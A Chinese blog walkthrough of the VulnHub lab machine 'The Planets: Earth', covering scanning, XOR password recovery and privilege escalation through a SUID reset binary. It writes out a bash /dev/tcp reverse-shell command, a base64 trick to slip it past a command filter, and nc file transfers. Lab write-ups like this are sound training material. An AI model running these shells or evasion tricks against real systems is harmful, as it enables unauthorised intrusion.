【vulnhub】the-planets-earth

置顶 已于 2023-03-19 15:51:38 修改
阅读量92 收藏
点赞数
分类专栏: vulnhub 文章标签: bash Powered by 金山文档
于 2023-03-14 16:24:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42667028/article/details/129531386
版权

靶场链接https://www.vulnhub.com/entry/the-planets-earth,755/

  • Name: The Planets: Earth

  • Date release: 2 Nov 2021

靶机下载后,成功导入vm

kali网络配置:NAT

靶机网络配置:NAT

扫描ip地址和mac地址

arp-scan -l

kali主机ip:192.168.241.129

靶机主机ip:192.168.241.128

nmap扫描靶机端口

nmap -T4 -sV -p- -A 192.168.241.128

发现22,80,443端口,还有重要信息DNS:earth.local DNS:terratest.earth.local

修改/etc/hosts文件,添加

192.168.241.128 earth.local
192.168.241.128 terratest.earth.local

登录https://earth.localhttps://terratest.earth.local

发现两个网址可以打开。

dirb扫描https://earth.localhttps://terratest.earth.local

dirb https://earth.local
dirb https://terratest.earth.local

发现一个登录页面和robot.txt

尝试/testingnotes.*,最终发现.txt后缀可以成功进入

以上信息总结:

1.使用XOR运算

2.testdata.txt文件的内容参与过计算

3.terra是用户名

使用大佬的CyberChef,XOR运算得到循环的密码:earthclimatechangebad4humansearth

用户名terra,密码earthclimatechangebad4humansearth,成功登录,发现是命令台,尝试ls命令

官网提示:There are two flags on the box: a user and root flag which include an md5 hash.

所以系统里先寻找下flag文件,成功找到/var/earth_web/user_flag.txt

find / -name "*flag*"

接下来尝试反弹shell

kali先监听端口:nc -l -p 8888

靶机在网站中输入: bash -i &>/dev/tcp/192.168.241.129/8888 <&1

bash -i &>/dev/tcp/192.168.241.129/8888 <&1

发现被拒绝,尝试将上bash -i &>/dev/tcp/192.168.241.129/8888 <&1转为进行base64编码

echo "bash -i &>/dev/tcp/192.168.241.129/8888 <&1" | base64
echo YmFzaCAtaSAmPi9kZXYvdGNwLzE5Mi4xNjguMjQxLjEyOS84ODg4IDwmMQo= | base64 -d | bash

成功反弹shell,接下来就是提权了

尝试查看suid权限的文件,发现reset_root可能是重置密码文件

但尝试运行不了,gg

由于靶机中没有strace,把这个文件传到kali中

kali:nc -l -p 1234 > reset_root

靶机:nc 192.168.241.129 1234 > /usr/bin/reset_root

使用strace看看有什么问题

发现有三个文件目录没有,再去查查access函数作用,其中F_OK 值为0,判断文件是否存在,尝试在靶机中添加这个三个文件夹

再次运行密码成功重置为Earth

靶机尝试登录用户名root,密码Earth

成功登录,get flag

唉哟喂New
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Procedural-Planets
04-03
程序行星
flutter-planets
03-21
flutter_learning一个新的Flutter项目。入门该项目是Flutter应用程序的起点。如果这是您的第一个Flutter项目,那么有一些资源可以帮助您入门:要获得Flutter入门方面的帮助,请查看我们的,其中提供了教程,示例,...
Vulnhub-THE PLANETS: EARTH
豆傻小饼干随记
11-14 3057
原文:http://www.valesec.top/archives/theplanetsearth THE PLANETS: EARTH 靶机描述 Difficulty: Easy ​ Earth is an easy box though you will likely find it more challenging than "Mercury" in this series and on the harder side of easy, depending on your experi...
VulnHub | The-Planets:Earth
薛定的餓貓
12-10 3865
The Planets: Earth 目录The Planets: Earth项目地址测试环境信息收集漏洞利用权限提升 项目地址 http://www.vulnhub.com/entry/the-planets-earth,755/ 难度:Easy 测试环境 攻击机:Kali 192.168.56.111 目标靶机:Fedora 192.168.56.110 信息收集 打开目标靶机,使用arp-scan -I eth1 -l指定网卡并扫描局域网内存活机器IP,使用nmap扫描开启了什么端口,然后使用-sV参
vulnhub-The Planets: Earth
qq_43006864的博客
06-09 446
The Planets: Earth ~ VulnHub靶机:The Planets: Earth ~ VulnHub攻击机:Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux信息收集nmap 192.168.1.1/24开放了22 80 443 继续探测端口详细信息。又看到了python环境,那基本上就 CVE-2021-4034一打就死。然后注意看这两个dns记录。访问一下80和
vulnhub靶场——THE PLANETS:EARTH
Czheisenberg的博客
02-12 1469
THE PLANETS:EARTH 准备 攻击机: kali 靶机: THE PLANETS:EARTH NAT 192.168.91.0 网段 下载连接 [https://www.vulnhub.com/entry/the-planets-earth,755/] 信息搜集与利用 主机发现 https://github.com/czheisenberg/MyCode/blob/master/Scan/scapy/ping.py 如图所示利用python脚本扫描除了 IP 地址。 端口扫描 nmap -O
Three-Planets:WebGL 项目
06-21
三颗行星 威廉和第三组的 WebGL 项目。
LOD-Planets-in-Unity
05-11
LOD统一行星 请阅读LICENSE.txt文件 新说明(用于使用unity项目) 只需将项目添加到Unity Hub并打开它即可! Universe和玩家应该是称为Universe的GameObject的子代。 该宇宙将四处移动以避免浮点问题。...
Java Vga-Planets Client-开源
04-27
Java库和基本客户端(JVPC),check + action程序(VPCheck),用于VGA-Planets的Blitz程序
把本机的bash构建到docker镜像里面
qq_33906471的博客
06-15 348
最近突发奇想,想把本机的bash放到docker镜像里面,接下来看操作。
Linux rm命令由于要删的文件太多报-bash: /usr/bin/rm:参数列表过长,无法删除的解决办法
最新发布
长源的博客
06-15 217
因此可通过find命令将要删的文件查找出来,然后将查找结果通过管道命令传给xargs命令来删除。查到了解决办法,记录在此。需要使用xargs命令来解决参数列表过长的问题。
面试专区|【40道Bash Shell高频题整理(附答案背诵版)】
尺小闹的博客
06-11 1023
Shell 函数是一种封装了一系列命令的代码块,可以在 Shell 脚本中定义并重复使用。这些函数类似于其他编程语言中的函数,使得代码更加模块化、易于管理和复用。在 Bash 脚本中定义和使用函数可以简化复杂的脚本,通过避免重复的代码来提高脚本的效率和可读性。使用function关键字echo "这是一个 Shell 函数"直接使用函数名,不带function关键字echo "这是一个 Shell 函数"两种定义方式在功能上没有区别,可以根据个人偏好或团队规范选择使用。不使用export。
患者发生输液反应的应急预案及护理流程(医院护理资料).docx
06-15
患者发生输液反应的应急预案及护理流程(医院护理资料).docx
chromedriver-win64_121.0.6105.0.zip
06-15
chromedriver-win64_121.0.6105.0.zip
chromedriver-win64_120.0.6099.35.zip
06-15
chromedriver-win64_120.0.6099.35.zip
php+sql成绩查询系统(系统+论文+答辩PPT).zip
06-15
php+sql成绩查询系统(系统+论文+答辩PPT).zip
这是一个使用java开发的简单帝国古典象棋游戏.zip
06-15
该资源内项目源码是个人的课程设计、毕业设计,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! ## 项目备注 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、作业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。 该资源内项目源码是个人的课程设计,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! ## 项目备注 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、作业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。
医院骨科资料:关节镜患者健康教育.docx
06-15
医院骨科资料:关节镜患者健康教育.docx
vulnhub靶场 planets
08-28
- *1* *2* [vulnhub靶场——THE PLANETS:EARTH](https://blog.csdn.net/Czheisenberg/article/details/122900121)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值